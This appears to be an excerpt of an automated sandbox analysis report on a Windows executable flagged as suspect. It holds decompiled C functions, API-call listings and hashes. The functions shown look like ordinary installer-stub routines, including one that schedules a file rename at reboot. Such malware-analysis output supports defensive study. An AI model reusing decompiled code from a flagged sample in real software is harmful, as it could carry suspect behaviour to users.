                                                              0x004051dd
                                                              0x004051e0
                                                              0x0040521e
                                                              0x00405249
                                                              0x00405220
                                                              0x0040522f
                                                              0x0040522f
                                                              0x004051e2
                                                              0x004051e5
                                                              0x004051f3
                                                              0x004051fd
                                                              0x00405205
                                                              0x0040520c
                                                              0x00405217
                                                              0x00405217
                                                              0x004051e0
                                                              0x0040524f
                                                              0x00405250
                                                              0x0040525c
                                                              0x0040525c
                                                              0x00405268
                                                              0x00405283
                                                              0x00405286
                                                              0x004052a3
                                                              0x00000000
                                                              0x00405288
                                                              0x0040528d
                                                              0x00405296
                                                              0x00405629
                                                              0x0040563b
                                                              0x0040563b
                                                              0x00405286
                                                              0x00000000
                                                              0x00405268
                                                              0x0040519a

                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                              • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                              • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                              • DeleteObject.GDI32(00000000), ref: 0040512B
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                              • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                              • GlobalFree.KERNEL32(?), ref: 0040546B
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                              • ShowWindow.USER32(?,00000000), ref: 00405615
                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                              • ShowWindow.USER32(00000000), ref: 00405627
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                              • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                              • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                              • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                              				intOrPtr _v8;
                                                              				int _v12;
                                                              				void* _v16;
                                                              				struct HWND__* _t56;
                                                              				intOrPtr _t69;
                                                              				signed int _t75;
                                                              				signed short* _t76;
                                                              				signed short* _t78;
                                                              				long _t92;
                                                              				int _t103;
                                                              				signed int _t110;
                                                              				intOrPtr _t113;
                                                              				WCHAR* _t114;
                                                              				signed int* _t116;
                                                              				WCHAR* _t117;
                                                              				struct HWND__* _t118;
                                                              
                                                              				if(_a8 != 0x110) {
                                                              					if(_a8 != 0x111) {
                                                              						L13:
                                                              						if(_a8 != 0x4e) {
                                                              							if(_a8 == 0x40b) {
                                                              								 *0x421714 =  *0x421714 + 1;
                                                              							}
                                                              							L27:
                                                              							_t114 = _a16;
                                                              							L28:
                                                              							return E0040462B(_a8, _a12, _t114);
                                                              						}
                                                              						_t56 = GetDlgItem(_a4, 0x3e8);
                                                              						_t114 = _a16;
                                                              						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                              							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                              							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                              							_v12 = _t103;
                                                              							_v16 = _t113;
                                                              							_v8 = 0x428200;
                                                              							if(_t103 - _t113 < 0x800) {
                                                              								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                              								SetCursor(LoadCursorW(0, 0x7f02));
                                                              								_push(1);
                                                              								E00404A32(_a4, _v8);
                                                              								SetCursor(LoadCursorW(0, 0x7f00));
                                                              								_t114 = _a16;
                                                              							}
                                                              						}
                                                              						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                              							goto L28;
                                                              						} else {
                                                              							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                              								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                              							}
                                                              							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                              								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                              							}
                                                              							return 1;
                                                              						}
                                                              					}
                                                              					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                              						goto L27;
                                                              					} else {
                                                              						_t69 =  *0x422720; // 0x59d07c
                                                              						_t29 = _t69 + 0x14; // 0x59d090
                                                              						_t116 = _t29;
                                                              						if(( *_t116 & 0x00000020) == 0) {
                                                              							goto L27;
                                                              						}
                                                              						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                              						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                              						E00404A0E();
                                                              						goto L13;
                                                              					}
                                                              				}
                                                              				_t117 = _a16;
                                                              				_t75 =  *(_t117 + 0x30);
                                                              				if(_t75 < 0) {
                                                              					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                              				}
                                                              				_t76 =  *0x42a298 + _t75 * 2;
                                                              				_t110 =  *_t76 & 0x0000ffff;
                                                              				_a8 = _t110;
                                                              				_t78 =  &(_t76[1]);
                                                              				_a16 = _t78;
                                                              				_v16 = _t78;
                                                              				_v12 = 0;
                                                              				_v8 = E00404734;
                                                              				if(_t110 != 2) {
                                                              					_v8 = E004046FA;
                                                              				}
                                                              				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                              				_push(0x22);
                                                              				E004045C4(_a4);
                                                              				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                              				_push(0x23);
                                                              				E004045C4(_a4);
                                                              				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                              				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                              				_t118 = GetDlgItem(_a4, 0x3e8);
                                                              				E004045F9(_t118);
                                                              				SendMessageW(_t118, 0x45b, 1, 0);
                                                              				_t92 =  *( *0x42a270 + 0x68);
                                                              				if(_t92 < 0) {
                                                              					_t92 = GetSysColor( ~_t92);
                                                              				}
                                                              				SendMessageW(_t118, 0x443, 0, _t92);
                                                              				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                              				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                              				 *0x421714 = 0;
                                                              				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                              				 *0x421714 = 0;
                                                              				return 0;
                                                              			}



















                                                              0x00404795
                                                              0x004048c2
                                                              0x0040491f
                                                              0x00404923
                                                              0x004049f0
                                                              0x004049f2
                                                              0x004049f2
                                                              0x004049f8
                                                              0x004049f8
                                                              0x004049fb
                                                              0x00000000
                                                              0x00404a02
                                                              0x00404931
                                                              0x00404937
                                                              0x00404941
                                                              0x0040494c
                                                              0x0040494f
                                                              0x00404952
                                                              0x0040495d
                                                              0x00404960
                                                              0x00404967
                                                              0x00404974
                                                              0x00404985
                                                              0x0040498b
                                                              0x00404993
                                                              0x004049a1
                                                              0x004049a7
                                                              0x004049a7
                                                              0x00404967
                                                              0x004049b1
                                                              0x00000000
                                                              0x004049bc
                                                              0x004049c0
                                                              0x004049d0
                                                              0x004049d0
                                                              0x004049d6
                                                              0x004049e2
                                                              0x004049e2
                                                              0x00000000
                                                              0x004049e6
                                                              0x004049b1
                                                              0x004048cd
                                                              0x00000000
                                                              0x004048df
                                                              0x004048df
                                                              0x004048e4
                                                              0x004048e4
                                                              0x004048ea
                                                              0x00000000
                                                              0x00000000
                                                              0x00404913
                                                              0x00404915
                                                              0x0040491a
                                                              0x00000000
                                                              0x0040491a
                                                              0x004048cd
                                                              0x0040479b
                                                              0x0040479e
                                                              0x004047a3
                                                              0x004047b4
                                                              0x004047b4
                                                              0x004047bc
                                                              0x004047bf
                                                              0x004047c3
                                                              0x004047c6
                                                              0x004047ca
                                                              0x004047cd
                                                              0x004047d0
                                                              0x004047d3
                                                              0x004047da
                                                              0x004047dc
                                                              0x004047dc
                                                              0x004047e6
                                                              0x004047f3
                                                              0x004047fd
                                                              0x00404802
                                                              0x00404805
                                                              0x0040480a
                                                              0x00404821
                                                              0x00404828
                                                              0x0040483b
                                                              0x0040483e
                                                              0x00404852
                                                              0x00404859
                                                              0x0040485e
                                                              0x00404863
                                                              0x00404863
                                                              0x00404871
                                                              0x0040487f
                                                              0x00404891
                                                              0x00404896
                                                              0x004048a6
                                                              0x004048a8
                                                              0x00000000

                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                              • GetSysColor.USER32(?), ref: 00404863
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                              • lstrlenW.KERNEL32(?), ref: 00404884
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                              • SendMessageW.USER32(00000000), ref: 00404906
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                              • SetCursor.USER32(00000000), ref: 00404985
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                              • SetCursor.USER32(00000000), ref: 004049A1
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: Call$N
                                                              • API String ID: 3103080414-3438112850
                                                              • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                              • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                              • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                              • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004062AE(void* __ecx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				long _t12;
                                                              				long _t24;
                                                              				char* _t31;
                                                              				int _t37;
                                                              				void* _t38;
                                                              				intOrPtr* _t39;
                                                              				long _t42;
                                                              				WCHAR* _t44;
                                                              				void* _t46;
                                                              				void* _t48;
                                                              				void* _t49;
                                                              				void* _t52;
                                                              				void* _t53;
                                                              
                                                              				_t38 = __ecx;
                                                              				_t44 =  *(_t52 + 0x14);
                                                              				 *0x426de8 = 0x55004e;
                                                              				 *0x426dec = 0x4c;
                                                              				if(_t44 == 0) {
                                                              					L3:
                                                              					_t2 = _t52 + 0x1c; // 0x4275e8
                                                              					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                              					if(_t12 != 0 && _t12 <= 0x400) {
                                                              						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                              						_t53 = _t52 + 0x10;
                                                              						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                              						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                              						_t48 = _t12;
                                                              						 *(_t53 + 0x18) = _t48;
                                                              						if(_t48 != 0xffffffff) {
                                                              							_t42 = GetFileSize(_t48, 0);
                                                              							_t6 = _t37 + 0xa; // 0xa
                                                              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                              							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                              								L18:
                                                              								return CloseHandle(_t48);
                                                              							} else {
                                                              								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                              									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                              									if(_t49 == 0) {
                                                              										_t48 =  *(_t53 + 0x18);
                                                              										L16:
                                                              										_t24 = _t42;
                                                              										L17:
                                                              										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                              										SetFilePointer(_t48, 0, 0, 0);
                                                              										E0040620A(_t48, _t46, _t42 + _t37);
                                                              										GlobalFree(_t46);
                                                              										goto L18;
                                                              									}
                                                              									_t39 = _t46 + _t42;
                                                              									_t31 = _t39 + _t37;
                                                              									while(_t39 > _t49) {
                                                              										 *_t31 =  *_t39;
                                                              										_t31 = _t31 - 1;
                                                              										_t39 = _t39 - 1;
                                                              									}
                                                              									_t24 = _t49 - _t46 + 1;
                                                              									_t48 =  *(_t53 + 0x18);
                                                              									goto L17;
                                                              								}
                                                              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                              								_t42 = _t42 + 0xa;
                                                              								goto L16;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					CloseHandle(E00406158(_t44, 0, 1));
                                                              					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                              					if(_t12 != 0 && _t12 <= 0x400) {
                                                              						goto L3;
                                                              					}
                                                              				}
                                                              				return _t12;
                                                              			}



















                                                              0x004062ae
                                                              0x004062b7
                                                              0x004062be
                                                              0x004062c8
                                                              0x004062dc
                                                              0x00406304
                                                              0x0040630b
                                                              0x0040630f
                                                              0x00406313
                                                              0x00406333
                                                              0x0040633a
                                                              0x00406344
                                                              0x00406351
                                                              0x00406356
                                                              0x0040635b
                                                              0x0040635f
                                                              0x0040636e
                                                              0x00406370
                                                              0x0040637d
                                                              0x00406381
                                                              0x0040641c
                                                              0x00000000
                                                              0x00406397
                                                              0x004063a4
                                                              0x004063c8
                                                              0x004063cc
                                                              0x004063eb
                                                              0x004063ef
                                                              0x004063ef
                                                              0x004063f1
                                                              0x004063fa
                                                              0x00406405
                                                              0x00406410
                                                              0x00406416
                                                              0x00000000
                                                              0x00406416
                                                              0x004063ce
                                                              0x004063d1
                                                              0x004063dc
                                                              0x004063d8
                                                              0x004063da
                                                              0x004063db
                                                              0x004063db
                                                              0x004063e3
                                                              0x004063e5
                                                              0x00000000
                                                              0x004063e5
                                                              0x004063af
                                                              0x004063b5
                                                              0x00000000
                                                              0x004063b5
                                                              0x00406381
                                                              0x0040635f
                                                              0x004062de
                                                              0x004062e9
                                                              0x004062f2
                                                              0x004062f6
                                                              0x00000000
                                                              0x00000000
                                                              0x004062f6
                                                              0x00406427

                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                              • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                              • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                              • wsprintfA.USER32 ref: 0040632D
                                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,80000000,00000003), ref: 0040615C
                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                              • API String ID: 2171350718-2295842750
                                                              • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                              • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                              • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                              • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                              				struct tagLOGBRUSH _v16;
                                                              				struct tagRECT _v32;
                                                              				struct tagPAINTSTRUCT _v96;
                                                              				struct HDC__* _t70;
                                                              				struct HBRUSH__* _t87;
                                                              				struct HFONT__* _t94;
                                                              				long _t102;
                                                              				signed int _t126;
                                                              				struct HDC__* _t128;
                                                              				intOrPtr _t130;
                                                              
                                                              				if(_a8 == 0xf) {
                                                              					_t130 =  *0x42a270;
                                                              					_t70 = BeginPaint(_a4,  &_v96);
                                                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                              					_a8 = _t70;
                                                              					GetClientRect(_a4,  &_v32);
                                                              					_t126 = _v32.bottom;
                                                              					_v32.bottom = _v32.bottom & 0x00000000;
                                                              					while(_v32.top < _t126) {
                                                              						_a12 = _t126 - _v32.top;
                                                              						asm("cdq");
                                                              						asm("cdq");
                                                              						asm("cdq");
                                                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                              						_t87 = CreateBrushIndirect( &_v16);
                                                              						_v32.bottom = _v32.bottom + 4;
                                                              						_a16 = _t87;
                                                              						FillRect(_a8,  &_v32, _t87);
                                                              						DeleteObject(_a16);
                                                              						_v32.top = _v32.top + 4;
                                                              					}
                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                              						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                              						_a16 = _t94;
                                                              						if(_t94 != 0) {
                                                              							_t128 = _a8;
                                                              							_v32.left = 0x10;
                                                              							_v32.top = 8;
                                                              							SetBkMode(_t128, 1);
                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                              							_a8 = SelectObject(_t128, _a16);
                                                              							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                              							SelectObject(_t128, _a8);
                                                              							DeleteObject(_a16);
                                                              						}
                                                              					}
                                                              					EndPaint(_a4,  &_v96);
                                                              					return 0;
                                                              				}
                                                              				_t102 = _a16;
                                                              				if(_a8 == 0x46) {
                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                              					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                              				}
                                                              				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                              			}













                                                              0x0040100a
                                                              0x00401039
                                                              0x00401047
                                                              0x0040104d
                                                              0x00401051
                                                              0x0040105b
                                                              0x00401061
                                                              0x00401064
                                                              0x004010f3
                                                              0x00401089
                                                              0x0040108c
                                                              0x004010a6
                                                              0x004010bd
                                                              0x004010cc
                                                              0x004010cf
                                                              0x004010d5
                                                              0x004010d9
                                                              0x004010e4
                                                              0x004010ed
                                                              0x004010ef
                                                              0x004010ef
                                                              0x00401100
                                                              0x00401105
                                                              0x0040110d
                                                              0x00401110
                                                              0x00401112
                                                              0x00401118
                                                              0x0040111f
                                                              0x00401126
                                                              0x00401130
                                                              0x00401142
                                                              0x00401156
                                                              0x00401160
                                                              0x00401165
                                                              0x00401165
                                                              0x00401110
                                                              0x0040116e
                                                              0x00000000
                                                              0x00401178
                                                              0x00401010
                                                              0x00401013
                                                              0x00401015
                                                              0x0040101f
                                                              0x0040101f
                                                              0x00000000

                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                              • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                              • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                              • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

